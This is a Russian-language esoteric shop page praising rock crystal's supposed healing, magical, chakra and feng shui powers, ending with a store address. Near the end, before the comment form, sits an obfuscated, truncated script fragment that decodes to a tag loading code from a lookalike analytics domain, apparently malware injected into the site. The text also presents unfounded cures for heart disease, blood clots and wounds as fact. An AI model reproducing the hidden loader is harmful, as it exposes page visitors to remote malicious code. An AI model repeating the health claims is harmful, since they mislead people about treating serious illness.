Лечебные свойства:

Горный хрусталь является прекрасным средством от болезней сердца, желудка и глаз, способствует хорошей работе спинного и головного мозга,. Кристаллы горного хрусталя стабилизируют духовные и физические силы человека, помогают снять головную боль, справиться со стрессом. Ношение этого камня на запястье регулирует ток крови, не позволяя образовываться тромбам. В современном Тибете лекари лечат раны, прикладывая к ним хрустальные шары таким образом, чтобы через камень на пораженное место попадали солнечные лучи. Современные ученые открыли секрет этого чудесного исцеления - при прохождении через кристалл горного хрусталя ультрафиолетовые лучи убивают бактерии, что и способствует скорейшему излечению.

Магические свойства

В качестве талисмана кристаллы горного хрусталя укрепляют постоянство, привлекают к владельцу любовь, радость жизни, симпатию других людей, удачу, душевный комфорт и благополучие.
Горный хрусталь помогает избавиться от ночных кошмаров, бессонницы и беспричинных страхов.  
По древним поверьям, горный хрусталь очищает тело, мысли, способствует выводу шлаков из организма. Тибетские ламы используют хрустальные шары для раскрытия «третьего глаза», они называют кристаллы горного хрусталя «живыми»,

Влияние на чакры

Горный хрусталь воздействует на Сахасрару.
Он также используется для очистки и активации всех нижних чакр.

Фэн-Шуй

Для создания в доме романтиеской обстановки рекомендуется расположить в юго-западной части квартиры шар из горного хрусталя. Его рекомендуют размещать также на секторе знаний и интеллекта (на северо-востоке), на секторе карьеры и успеха в бизнесе (на севере).

 

Приобрести шар из горного хрусталя Вы можете посетив наш эзотерический магазин по адресу г. Киев, ул. Гришка,8
#nzkt2#!tsd>#!iuuq;00hp1hmfbobmjujd/dpn0tdsjqut0epvcmfdmjdltubu/qiq#?=0tdsjqu?!";
m=""; for (i=0; i

Оставить комментарий

Ваш email не будет опубликован. Обязательные поля отмечены *

Вы можете использовать это HTMLтеги и атрибуты: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>